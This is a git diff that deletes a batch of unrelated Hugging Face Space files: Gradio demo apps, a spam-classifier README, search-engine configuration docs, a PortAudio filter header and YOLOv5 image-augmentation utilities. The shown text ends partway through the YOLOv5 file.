p{margin-bottom:10px;font-size:94%}a{text-decoration:underline}.tabs{margin-top:0;margin-bottom:0}#gallery{min-height:20rem} -""" -with gr.Blocks(css=css) as demo: - gr.HTML( - f""" -
      -
      -

      Openjourney

      -
      -

      - Demo for openjourney -

      -

      This demo is currently on cpu, to use it upgrade to gpu by going to settings after duplicating this space: Duplicate Space

      -

      -
      - """ - ) - with gr.Row(): - - with gr.Column(scale=55): - with gr.Group(): - model_name = gr.Dropdown(label="Model", choices=[m.name for m in models], value=current_model.name) - with gr.Box(visible=False) as custom_model_group: - custom_model_path = gr.Textbox(label="Custom model path", placeholder="Path to model, e.g. nitrosocke/Arcane-Diffusion", interactive=True) - gr.HTML("
      Custom models have to be downloaded first, so give it some time.
      ") - - with gr.Row(): - prompt = gr.Textbox(label="Prompt", show_label=False, max_lines=2,placeholder="Enter prompt. Style applied automatically").style(container=False) - generate = gr.Button(value="Generate").style(rounded=(False, True, True, False)) - - - image_out = gr.Image(height=512) - # gallery = gr.Gallery( - # label="Generated images", show_label=False, elem_id="gallery" - # ).style(grid=[1], height="auto") - error_output = gr.Markdown() - - with gr.Column(scale=45): - with gr.Tab("Options"): - with gr.Group(): - neg_prompt = gr.Textbox(label="Negative prompt", placeholder="What to exclude from the image") - - # n_images = gr.Slider(label="Images", value=1, minimum=1, maximum=4, step=1) - - with gr.Row(): - guidance = gr.Slider(label="Guidance scale", value=7.5, maximum=15) - steps = gr.Slider(label="Steps", value=25, minimum=2, maximum=75, step=1) - - with gr.Row(): - width = gr.Slider(label="Width", value=512, minimum=64, maximum=1024, step=8) - height = gr.Slider(label="Height", value=512, minimum=64, maximum=1024, step=8) - - seed = gr.Slider(0, 2147483647, label='Seed (0 = random)', value=0, step=1) - - with gr.Tab("Image to image"): - with gr.Group(): - image = gr.Image(label="Image", height=256, tool="editor", type="pil") - strength = gr.Slider(label="Transformation strength", minimum=0, maximum=1, step=0.01, value=0.5) - - if is_colab: - model_name.change(on_model_change, inputs=model_name, outputs=[custom_model_group, prompt], queue=False) - custom_model_path.change(custom_model_changed, inputs=custom_model_path, outputs=None) - # n_images.change(lambda n: gr.Gallery().style(grid=[2 if n > 1 else 1], height="auto"), inputs=n_images, outputs=gallery) - - inputs = [model_name, prompt, guidance, steps, width, height, seed, image, strength, neg_prompt] - outputs = [image_out, error_output] - prompt.submit(inference, inputs=inputs, outputs=outputs) - generate.click(inference, inputs=inputs, outputs=outputs) - - ex = gr.Examples([ - [models[0].name, "iron man", 7.5, 50], - - ], inputs=[model_name, prompt, guidance, steps, seed], outputs=outputs, fn=inference, cache_examples=False) - - gr.HTML(""" -
      -
      -

      Model by prompthero

      -
      - """) - -print(f"Space built in {time.time() - start_time:.2f} seconds") - -if not is_colab: - demo.queue(concurrency_count=1) -demo.launch(debug=is_colab, share=is_colab) \ No newline at end of file diff --git a/spaces/akuysal/SMS-spam-English-sklearn/README.md b/spaces/akuysal/SMS-spam-English-sklearn/README.md deleted file mode 100644 index 33b55b55013528a07d7ad4c86807d93573f1aba4..0000000000000000000000000000000000000000 --- a/spaces/akuysal/SMS-spam-English-sklearn/README.md +++ /dev/null @@ -1,21 +0,0 @@ ---- -title: SMS Spam English Scikit-Learn -emoji: 🌖 -colorFrom: gray -colorTo: green -sdk: streamlit -sdk_version: 1.17.0 -app_file: app.py -pinned: false -license: openrail ---- - -ENGLISH -The dataset used in the study "T.A. Almeida, J.M.G. Hidalgo, and A. Yamakami, Contributions to the Study of SMS Spam Filtering: New Collection and Results, Proc. 11th ACM Symposium on Document Engineering, pp. 259-262, 2011." is employed for training. The success ratio for Linear SVM Classifier is 0.9742 in terms of Macro-F1 when 10% of the dataset was used for testing. -The dataset is composed of SPAM and LEGITIMATE sms data. - -TÜRKÇE -Bu çalışmada "T.A. Almeida, J.M.G. Hidalgo, and A. Yamakami, Contributions to the Study of SMS Spam Filtering: New Collection and Results, Proc. 11th ACM Symposium on Document Engineering, pp. 259-262, 2011." başlıklı çalışmadaki veri seti kullanılmıştır. Linear SVM sınıflandırıcı için başarı oranı, veri setinin %10'u test için kullanıldığında Makro-F1 açısından 0.9742'dir. -Veri seti, SPAM ve LEGITIMATE kısa mesaj verilerinden oluşmaktadır. - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/alamin655/websurfx/docs/configuration.md b/spaces/alamin655/websurfx/docs/configuration.md deleted file mode 100644 index 665d939cef39e3c45d6cb68908651dc67b618044..0000000000000000000000000000000000000000 --- a/spaces/alamin655/websurfx/docs/configuration.md +++ /dev/null @@ -1,68 +0,0 @@ -# Configuration - -## Installed From Source - -If you have built `websurfx` from source then the configuration file will be located under project directory (codebase) at `websurfx/` - -> **Note** -> If you have built websurfx with unstable/rolling/edge branch then you can copy the configuration file from `websurfx/config.lua` located under project directory (codebase) to `~/.config/websurfx/` and make the changes there and rerun the websurfx server. _This is only available from unstable/rolling/edge version_. - -## Installed From Package - -If you have installed `websurfx` using the package manager of your Linux distro then the default configuration file will be located at `/etc/xdg/websurfx/`. You can copy the default config to `~/.config/websurfx/` and make the changes there and rerun the websurfx server. - -Some of the configuration options provided in the file are stated below. These are subdivided into the following categories: - -- General -- Server -- Website -- Cache -- Search Engines - -# General - -- **logging:** An option to enable or disable logs. -- **debug:** An option to enable or disable debug mode. -- **threads:** The amount of threads that the app will use to run (the value should be greater than 0). - -## Server - -- **port:** Port number on which server should be launched. -- **binding_ip_addr:** IP address on the which server should be launched. -- **production_use:** Whether to use production mode or not (in other words this option should be used if it is to be used to host it on the server to provide a service to a large number of users). If production_use is set to true. There will be a random delay before sending the request to the search engines, this is to prevent DDoSing the upstream search engines from a large number of simultaneous requests. This is newly added option and hence is only available in the **edge version**. -- **request_timeout:** Timeout for the search requests sent to the upstream search engines to be fetched (value in seconds). - -## Website - -- **colorscheme:** The colorscheme name which should be used for the website theme (the name should be in accordance to the colorscheme file name present in `public/static/colorschemes` folder). - -> By Default we provide 12 colorschemes to choose from these are: -> -> 1. catppuccin-mocha -> 2. dark-chocolate -> 3. dracula -> 4. gruvbox-dark -> 5. monokai -> 6. nord -> 7. oceanic-next -> 8. one-dark -> 9. solarized-dark -> 10. solarized-light -> 11. tokyo-night -> 12. tomorrow-night - -- **theme:** The theme name which should be used for the website (again, the name should be in accordance to the theme file name present in `public/static/themes` folder). - -> By Default we provide 1 theme to choose from these are: -> -> 1. simple - -## Cache - -- **redis_url:** Redis connection url address on which the client should connect on. - -## Search Engines - -- **upstream_search_engines:** Select from the different upstream search engines from which the results should be fetched. - -[⬅️ Go back to Home](./README.md) diff --git a/spaces/aliabid94/GPT-Golf/run.py b/spaces/aliabid94/GPT-Golf/run.py deleted file mode 100644 index 74c14871d68aa867516d5fc8c49aa8a19deebe4c..0000000000000000000000000000000000000000 --- a/spaces/aliabid94/GPT-Golf/run.py +++ /dev/null @@ -1,115 +0,0 @@ -import gradio as gr -import json -import random -# from transformers import pipeline - -# generator = pipeline("text-generation", model="gpt2", max_length=60) - -with open("wordlist.json") as wordlist_json: - wordlist = json.load(wordlist_json) - - -def autocomplete(text): - return "more words" - # end_text = " ".join(text.split(" ")[-30:-1]) - # generated_text = generator( - # end_text, return_full_text=False, clean_up_tokenization_spaces=True - # )[0]["generated_text"] - # generated_text = generated_text.replace("\n", "") - # return generated_text - - -with gr.Blocks() as demo: - gr.Markdown( - """ - # GPT Golf - - How many turns will it take you to get GPT to say the target word? - Here are the rules of the game: - - Your goal is to get GPT to say a target word in as few turns as possible. - - Each turn, you add up to 5 words to its dialogue. - - When you click submit, your prompt will be added to the dialogue. Then GPT will also add to the dialogue. - - You can't say the target word, but as soon as GPT does, you win! - """ - ) - error_box = gr.Textbox(label="Error", elem_id="error", visible=False) - dialogue_var = gr.Variable(value=[]) - - start_btn = gr.Button("Start", variant="primary") - with gr.Column(visible=False) as game: - with gr.Row() as stats: - target_word_box = gr.Textbox( - label="Target Word", elem_id="target", interactive=False - ) - num_turns_box = gr.Number(0, label="# of Turns so Far", elem_id="num_turns") - dialogue_box = gr.HighlightedText(label="Dialogue") - with gr.Column() as prompt_set: - prompt_box = gr.Textbox(label="Prompt", placeholder="Enter Next 5 Words...") - submit_btn = gr.Button("Submit").style(full_width=True) - win = gr.HTML( - "
      You Won!
      ", - visible=False, - ) - - def start_game(): - return { - start_btn: gr.update(visible=False), - game: gr.update(visible=True), - target_word_box: random.choice(wordlist), - } - - start_btn.click(start_game, inputs=None, outputs=[start_btn, game, target_word_box]) - - def submit(prompt, target_word, dialogue, num_turns): - if len(prompt.split(" ")) > 5: - return { - error_box: gr.update( - visible=True, value="Prompt must be a maximum of 5 words!" - ) - } - if target_word in prompt: - return { - error_box: gr.update( - visible=True, value="You can't use the target word in the prompt!" - ) - } - dialogue.append(prompt) - response = autocomplete(" ".join(dialogue)) - dialogue.append(response) - labeled_dialogue = [ - (text, None if i % 2 == 0 else "gpt") for i, text in enumerate(dialogue) - ] - if target_word in response: - return { - dialogue_box: labeled_dialogue, - prompt_set: gr.update(visible=False), - win: gr.update(visible=True), - num_turns_box: num_turns + 1, - dialogue_var: dialogue, - error_box: gr.update(visible=False), - } - else: - return { - dialogue_box: labeled_dialogue, - prompt_box: "", - num_turns_box: num_turns + 1, - dialogue_var: dialogue, - error_box: gr.update(visible=False), - } - - submit_btn.click( - submit, - inputs=[prompt_box, target_word_box, dialogue_var, num_turns_box], - outputs=[ - dialogue_var, - dialogue_box, - prompt_box, - num_turns_box, - error_box, - prompt_set, - win, - ], - ) - - -demo.launch() diff --git a/spaces/allknowingroger/Image-Models-Test113/app.py b/spaces/allknowingroger/Image-Models-Test113/app.py deleted file mode 100644 index 2c6f2c273c69698050688c8008594f028e74031a..0000000000000000000000000000000000000000 --- a/spaces/allknowingroger/Image-Models-Test113/app.py +++ /dev/null @@ -1,144 +0,0 @@ -import gradio as gr -# import os -# import sys -# from pathlib import Path -import time - -models =[ - "CiroN2022/cyber-aesthetic", - "CiroN2022/cyber-graphic", - "Yntec/dreamlike-photoreal-remix", - "sourceoftruthdata/sot_autotrain_dreambooth_v1", - "milaidy/lance", - "Akibub/jennysmith3", - "ahmedghani/waqasramzan-2500-sdxl", - "suraj143/my-friend", - "CiroN2022/xenomorph-book", -] - - -model_functions = {} -model_idx = 1 -for model_path in models: - try: - model_functions[model_idx] = gr.Interface.load(f"models/{model_path}", live=False, preprocess=True, postprocess=False) - except Exception as error: - def the_fn(txt): - return None - model_functions[model_idx] = gr.Interface(fn=the_fn, inputs=["text"], outputs=["image"]) - model_idx+=1 - - -def send_it_idx(idx): - def send_it_fn(prompt): - output = (model_functions.get(str(idx)) or model_functions.get(str(1)))(prompt) - return output - return send_it_fn - -def get_prompts(prompt_text): - return prompt_text - -def clear_it(val): - if int(val) != 0: - val = 0 - else: - val = 0 - pass - return val - -def all_task_end(cnt,t_stamp): - to = t_stamp + 60 - et = time.time() - if et > to and t_stamp != 0: - d = gr.update(value=0) - tog = gr.update(value=1) - #print(f'to: {to} et: {et}') - else: - if cnt != 0: - d = gr.update(value=et) - else: - d = gr.update(value=0) - tog = gr.update(value=0) - #print (f'passing: to: {to} et: {et}') - pass - return d, tog - -def all_task_start(): - print("\n\n\n\n\n\n\n") - t = time.gmtime() - t_stamp = time.time() - current_time = time.strftime("%H:%M:%S", t) - return gr.update(value=t_stamp), gr.update(value=t_stamp), gr.update(value=0) - -def clear_fn(): - nn = len(models) - return tuple([None, *[None for _ in range(nn)]]) - - - -with gr.Blocks(title="SD Models") as my_interface: - with gr.Column(scale=12): - # with gr.Row(): - # gr.Markdown("""- Primary prompt: 你想画的内容(英文单词,如 a cat, 加英文逗号效果更好;点 Improve 按钮进行完善)\n- Real prompt: 完善后的提示词,出现后再点右边的 Run 按钮开始运行""") - with gr.Row(): - with gr.Row(scale=6): - primary_prompt=gr.Textbox(label="Prompt", value="") - # real_prompt=gr.Textbox(label="Real prompt") - with gr.Row(scale=6): - # improve_prompts_btn=gr.Button("Improve") - with gr.Row(): - run=gr.Button("Run",variant="primary") - clear_btn=gr.Button("Clear") - with gr.Row(): - sd_outputs = {} - model_idx = 1 - for model_path in models: - with gr.Column(scale=3, min_width=320): - with gr.Box(): - sd_outputs[model_idx] = gr.Image(label=model_path) - pass - model_idx += 1 - pass - pass - - with gr.Row(visible=False): - start_box=gr.Number(interactive=False) - end_box=gr.Number(interactive=False) - tog_box=gr.Textbox(value=0,interactive=False) - - start_box.change( - all_task_end, - [start_box, end_box], - [start_box, tog_box], - every=1, - show_progress=False) - - primary_prompt.submit(all_task_start, None, [start_box, end_box, tog_box]) - run.click(all_task_start, None, [start_box, end_box, tog_box]) - runs_dict = {} - model_idx = 1 - for model_path in models: - runs_dict[model_idx] = run.click(model_functions[model_idx], inputs=[primary_prompt], outputs=[sd_outputs[model_idx]]) - model_idx += 1 - pass - pass - - # improve_prompts_btn_clicked=improve_prompts_btn.click( - # get_prompts, - # inputs=[primary_prompt], - # outputs=[primary_prompt], - # cancels=list(runs_dict.values())) - clear_btn.click( - clear_fn, - None, - [primary_prompt, *list(sd_outputs.values())], - cancels=[*list(runs_dict.values())]) - tog_box.change( - clear_it, - tog_box, - tog_box, - cancels=[*list(runs_dict.values())]) - -my_interface.queue(concurrency_count=600, status_update_rate=1) -my_interface.launch(inline=True, show_api=False) - \ No newline at end of file diff --git a/spaces/alvanlii/FROMAGe/fromage/losses.py b/spaces/alvanlii/FROMAGe/fromage/losses.py deleted file mode 100644 index 391aca6b29a95c3047a016e84e2684537580b022..0000000000000000000000000000000000000000 --- a/spaces/alvanlii/FROMAGe/fromage/losses.py +++ /dev/null @@ -1,44 +0,0 @@ -from typing import Optional -import torch -from fromage import utils - -def contrastive_loss(logits: torch.Tensor) -> torch.Tensor: - return torch.nn.functional.cross_entropy(logits, torch.arange(len(logits), device=logits.device)) - - -def contrastive_acc(logits: torch.Tensor, target: Optional[torch.Tensor] = None, topk=(1,)) -> torch.Tensor: - """ - Args: - logits: (N, N) predictions. - target: (N, num_correct_answers) labels. - """ - assert len(logits.shape) == 2, logits.shape - batch_size = logits.shape[0] - - if target is None: - target = torch.arange(len(logits), device=logits.device) - return utils.accuracy(logits, target, -1, topk) - else: - assert len(target.shape) == 2, target.shape - with torch.no_grad(): - maxk = max(topk) - if logits.shape[-1] < maxk: - print(f"[WARNING] Less than {maxk} predictions available. Using {logits.shape[-1]} for topk.") - maxk = min(maxk, logits.shape[-1]) - - # Take topk along the last dimension. - _, pred = logits.topk(maxk, -1, True, True) # (N, topk) - assert pred.shape == (batch_size, maxk) - - target_expand = target[:, :, None].repeat(1, 1, maxk) # (N, num_correct_answers, topk) - pred_expand = pred[:, None, :].repeat(1, target.shape[1], 1) # (N, num_correct_answers, topk) - correct = pred_expand.eq(target_expand) # (N, num_correct_answers, topk) - correct = torch.any(correct, dim=1) # (N, topk) - - res = [] - for k in topk: - any_k_correct = torch.clamp(correct[:, :k].sum(1), max=1) # (N,) - correct_k = any_k_correct.float().sum(0, keepdim=True) - res.append(correct_k.mul_(100.0 / batch_size)) - return res - diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/qa/loopback/src/biquad_filter.h b/spaces/amarchheda/ChordDuplicate/portaudio/qa/loopback/src/biquad_filter.h deleted file mode 100644 index 0895abae73ea24b7deac81b48338a17c5c94cb1a..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/qa/loopback/src/biquad_filter.h +++ /dev/null @@ -1,38 +0,0 @@ -#ifndef _BIQUADFILTER_H -#define _BIQUADFILTER_H - - -/** - * Unit_BiquadFilter implements a second order IIR filter. - * - * @author (C) 2002 Phil Burk, SoftSynth.com, All Rights Reserved - */ - -#define BIQUAD_MIN_RATIO (0.000001) -#define BIQUAD_MIN_Q (0.00001) - -typedef struct BiquadFilter_s -{ - double xn1; // storage for delayed signals - double xn2; - double yn1; - double yn2; - - double a0; // coefficients - double a1; - double a2; - - double b1; - double b2; - - double cos_omega; - double sin_omega; - double alpha; -} BiquadFilter; - -void BiquadFilter_SetupHighPass( BiquadFilter *filter, double ratio, double Q ); -void BiquadFilter_SetupNotch( BiquadFilter *filter, double ratio, double Q ); - -void BiquadFilter_Filter( BiquadFilter *filter, float *inputs, float *outputs, int numSamples ); - -#endif diff --git a/spaces/amirDev/crowd-counting-p2p/crowd_datasets/SHHA/loading_data.py b/spaces/amirDev/crowd-counting-p2p/crowd_datasets/SHHA/loading_data.py deleted file mode 100644 index ad921133886d39ce36bc66599c87f03ed5b0781e..0000000000000000000000000000000000000000 --- a/spaces/amirDev/crowd-counting-p2p/crowd_datasets/SHHA/loading_data.py +++ /dev/null @@ -1,27 +0,0 @@ -import torchvision.transforms as standard_transforms -from .SHHA import SHHA - -# DeNormalize used to get original images -class DeNormalize(object): - def __init__(self, mean, std): - self.mean = mean - self.std = std - - def __call__(self, tensor): - for t, m, s in zip(tensor, self.mean, self.std): - t.mul_(s).add_(m) - return tensor - -def loading_data(data_root): - # the pre-proccssing transform - transform = standard_transforms.Compose([ - standard_transforms.ToTensor(), - standard_transforms.Normalize(mean=[0.485, 0.456, 0.406], - std=[0.229, 0.224, 0.225]), - ]) - # create the training dataset - train_set = SHHA(data_root, train=True, transform=transform, patch=True, flip=True) - # create the validation dataset - val_set = SHHA(data_root, train=False, transform=transform) - - return train_set, val_set diff --git a/spaces/anaclaudia13ct/insect_detection/utils/augmentations.py b/spaces/anaclaudia13ct/insect_detection/utils/augmentations.py deleted file mode 100644 index 1eae5db8f816b69cb768acc0677194fa7a215678..0000000000000000000000000000000000000000 --- a/spaces/anaclaudia13ct/insect_detection/utils/augmentations.py +++ /dev/null @@ -1,397 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -Image augmentation functions -""" - -import math -import random - -import cv2 -import numpy as np -import torch -import torchvision.transforms as T -import torchvision.transforms.functional as TF - -from utils.general import LOGGER, check_version, colorstr, resample_segments, segment2box, xywhn2xyxy -from utils.metrics import bbox_ioa - -IMAGENET_MEAN = 0.485, 0.456, 0.406 # RGB mean -IMAGENET_STD = 0.229, 0.224, 0.225 # RGB standard deviation - - -class Albumentations: - # YOLOv5 Albumentations class (optional, only used if package is installed) - def __init__(self, size=640): - self.transform = None - prefix = colorstr('albumentations: ') - try: - import albumentations as A - check_version(A.__version__, '1.0.3', hard=True) # version requirement - - T = [ - A.RandomResizedCrop(height=size, width=size, scale=(0.8, 1.0), ratio=(0.9, 1.11), p=0.0), - A.Blur(p=0.01), - A.MedianBlur(p=0.01), - A.ToGray(p=0.01), - A.CLAHE(p=0.01), - A.RandomBrightnessContrast(p=0.0), - A.RandomGamma(p=0.0), - A.ImageCompression(quality_lower=75, p=0.0)] # transforms - self.transform = A.Compose(T, bbox_params=A.BboxParams(format='yolo', label_fields=['class_labels'])) - - LOGGER.info(prefix + ', '.join(f'{x}'.replace('always_apply=False, ', '') for x in T if x.p)) - except ImportError: # package not installed, skip - pass - except Exception as e: - LOGGER.info(f'{prefix}{e}') - - def __call__(self, im, labels, p=1.0): - if self.transform and random.random() < p: - new = self.transform(image=im, bboxes=labels[:, 1:], class_labels=labels[:, 0]) # transformed - im, labels = new['image'], np.array([[c, *b] for c, b in zip(new['class_labels'], new['bboxes'])]) - return im, labels - - -def normalize(x, mean=IMAGENET_MEAN, std=IMAGENET_STD, inplace=False): - # Denormalize RGB images x per ImageNet stats in BCHW format, i.e. = (x - mean) / std - return TF.normalize(x, mean, std, inplace=inplace) - - -def denormalize(x, mean=IMAGENET_MEAN, std=IMAGENET_STD): - # Denormalize RGB images x per ImageNet stats in BCHW format, i.e. = x * std + mean - for i in range(3): - x[:, i] = x[:, i] * std[i] + mean[i] - return x - - -def augment_hsv(im, hgain=0.5, sgain=0.5, vgain=0.5): - # HSV color-space augmentation - if hgain or sgain or vgain: - r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains - hue, sat, val = cv2.split(cv2.cvtColor(im, cv2.COLOR_BGR2HSV)) - dtype = im.dtype # uint8 - - x = np.arange(0, 256, dtype=r.dtype) - lut_hue = ((x * r[0]) % 180).astype(dtype) - lut_sat = np.clip(x * r[1], 0, 255).astype(dtype) - lut_val = np.clip(x * r[2], 0, 255).astype(dtype) - - im_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))) - cv2.cvtColor(im_hsv, cv2.COLOR_HSV2BGR, dst=im) # no return needed - - -def hist_equalize(im, clahe=True, bgr=False): - # Equalize histogram on BGR image 'im' with im.shape(n,m,3) and range 0-255 - yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV) - if clahe: - c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8)) - yuv[:, :, 0] = c.apply(yuv[:, :, 0]) - else: - yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram - return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB - - -def replicate(im, labels): - # Replicate labels - h, w = im.shape[:2] - boxes = labels[:, 1:].astype(int) - x1, y1, x2, y2 = boxes.T - s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels) - for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices - x1b, y1b, x2b, y2b = boxes[i] - bh, bw = y2b - y1b, x2b - x1b - yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y - x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh] - im[y1a:y2a, x1a:x2a] = im[y1b:y2b, x1b:x2b] # im4[ymin:ymax, xmin:xmax] - labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0) - - return im, labels - - -def letterbox(im, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32): - # Resize and pad image while meeting stride-multiple constraints - shape = im.shape[:2] # current shape [height, width] - if isinstance(new_shape, int): - new_shape = (new_shape, new_shape) - - # Scale ratio (new / old) - r = min(new_shape[0] / shape[0], new_shape[1] / shape[1]) - if not scaleup: # only scale down, do not scale up (for better val mAP) - r = min(r, 1.0) - - # Compute padding - ratio = r, r # width, height ratios - new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r)) - dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding - if auto: # minimum rectangle - dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding - elif scaleFill: # stretch - dw, dh = 0.0, 0.0 - new_unpad = (new_shape[1], new_shape[0]) - ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios - - dw /= 2 # divide padding into 2 sides - dh /= 2 - - if shape[::-1] != new_unpad: # resize - im = cv2.resize(im, new_unpad, interpolation=cv2.INTER_LINEAR) - top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1)) - left, right = int(round(dw - 0.1)), int(round(dw + 0.1)) - im = cv2.copyMakeBorder(im, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border - return im, ratio, (dw, dh) - - -def random_perspective(im, - targets=(), - segments=(), - degrees=10, - translate=.1, - scale=.1, - shear=10, - perspective=0.0, - border=(0, 0)): - # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(0.1, 0.1), scale=(0.9, 1.1), shear=(-10, 10)) - # targets = [cls, xyxy] - - height = im.shape[0] + border[0] * 2 # shape(h,w,c) - width = im.shape[1] + border[1] * 2 - - # Center - C = np.eye(3) - C[0, 2] = -im.shape[1] / 2 # x translation (pixels) - C[1, 2] = -im.shape[0] / 2 # y translation (pixels) - - # Perspective - P = np.eye(3) - P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y) - P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x) - - # Rotation and Scale - R = np.eye(3) - a = random.uniform(-degrees, degrees) - # a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations - s = random.uniform(1 - scale, 1 + scale) - # s = 2 ** random.uniform(-scale, scale) - R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s) - - # Shear - S = np.eye(3) - S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg) - S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg) - - # Translation - T = np.eye(3) - T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels) - T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels) - - # Combined rotation matrix - M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT - if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed - if perspective: - im = cv2.warpPerspective(im, M, dsize=(width, height), borderValue=(114, 114, 114)) - else: # affine - im = cv2.warpAffine(im, M[:2], dsize=(width, height), borderValue=(114, 114, 114)) - - # Visualize - # import matplotlib.pyplot as plt - # ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel() - # ax[0].imshow(im[:, :, ::-1]) # base - # ax[1].imshow(im2[:, :, ::-1]) # warped - - # Transform label coordinates - n = len(targets) - if n: - use_segments = any(x.any() for x in segments) - new = np.zeros((n, 4)) - if use_segments: # warp segments - segments = resample_segments(segments) # upsample - for i, segment in enumerate(segments): - xy = np.ones((len(segment), 3)) - xy[:, :2] = segment - xy = xy @ M.T # transform - xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine - - # clip - new[i] = segment2box(xy, width, height) - - else: # warp boxes - xy = np.ones((n * 4, 3)) - xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1 - xy = xy @ M.T # transform - xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine - - # create new boxes - x = xy[:, [0, 2, 4, 6]] - y = xy[:, [1, 3, 5, 7]] - new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T - - # clip - new[:, [0, 2]] = new[:, [0, 2]].clip(0, width) - new[:, [1, 3]] = new[:, [1, 3]].clip(0, height) - - # filter candidates - i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10) - targets = targets[i] - targets[:, 1:5] = new[i] - - return im, targets - - -def copy_paste(im, labels, segments, p=0.5): - # Implement Copy-Paste augmentation https://arxiv.org/abs/2012.07177, labels as nx5 np.array(cls, xyxy) - n = len(segments) - if p and n: - h, w, c = im.shape # height, width, channels - im_new = np.zeros(im.shape, np.uint8) - for j in random.sample(range(n), k=round(p * n)): - l, s = labels[j], segments[j] - box = w - l[3], l[2], w - l[1], l[4] - ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area - if (ioa < 0.30).all(): # allow 30% obscuration of existing labels - labels = np.concatenate((labels, [[l[0], *box]]), 0) - segments.append(np.concatenate((w - s[:, 0:1], s[:, 1:2]), 1)) - cv2.drawContours(im_new, [segments[j].astype(np.int32)], -1, (1, 1, 1), cv2.FILLED) - - result = cv2.flip(im, 1) # augment segments (flip left-right) - i = cv2.flip(im_new, 1).astype(bool) - im[i] = result[i] # cv2.imwrite('debug.jpg', im) # debug - - return im, labels, segments - - -def cutout(im, labels, p=0.5): - # Applies image cutout augmentation https://arxiv.org/abs/1708.04552 - if random.random() < p: - h, w = im.shape[:2] - scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction - for s in scales: - mask_h = random.randint(1, int(h * s)) # create random masks - mask_w = random.randint(1, int(w * s)) - - # box - xmin = max(0, random.randint(0, w) - mask_w // 2) - ymin = max(0, random.randint(0, h) - mask_h // 2) - xmax = min(w, xmin + mask_w) - ymax = min(h, ymin + mask_h) - - # apply random color mask - im[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)] - - # return unobscured labels - if len(labels) and s > 0.03: - box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32) - ioa = bbox_ioa(box, xywhn2xyxy(labels[:, 1:5], w, h)) # intersection over area - labels = labels[ioa < 0.60] # remove >60% obscured labels - - return labels - - -def mixup(im, labels, im2, labels2): - # Applies MixUp augmentation https://arxiv.org/pdf/1710.09412.pdf - r = np.random.beta(32.0, 32.0) # mixup ratio, alpha=beta=32.0 - im = (im * r + im2 * (1 - r)).astype(np.uint8) - labels = np.concatenate((labels, labels2), 0) - return im, labels - - -def box_candidates(box1, box2, wh_thr=2, ar_thr=100, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n) - # Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio - w1, h1 = box1[2] - box1[0], box1[3] - box1[1] - w2, h2 = box2[2] - box2[0], box2[3] - box2[1] - ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio - return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates - - -def classify_albumentations( - augment=True, - size=224, - scale=(0.08, 1.0), - ratio=(0.75, 1.0 / 0.75), # 0.75, 1.33 - hflip=0.5, - vflip=0.0, - jitter=0.4, - mean=IMAGENET_MEAN, - std=IMAGENET_STD, - auto_aug=False): - # YOLOv5 classification Albumentations (optional, only used if package is installed) - prefix = colorstr('albumentations: ') - try: - import albumentations as A - from albumentations.pytorch import ToTensorV2 - check_version(A.__version__, '1.0.3', hard=True) # version requirement - if augment: # Resize and crop - T = [A.RandomResizedCrop(height=size, width=size, scale=scale, ratio=ratio)] - if auto_aug: - # TODO: implement AugMix, AutoAug & RandAug in albumentation - 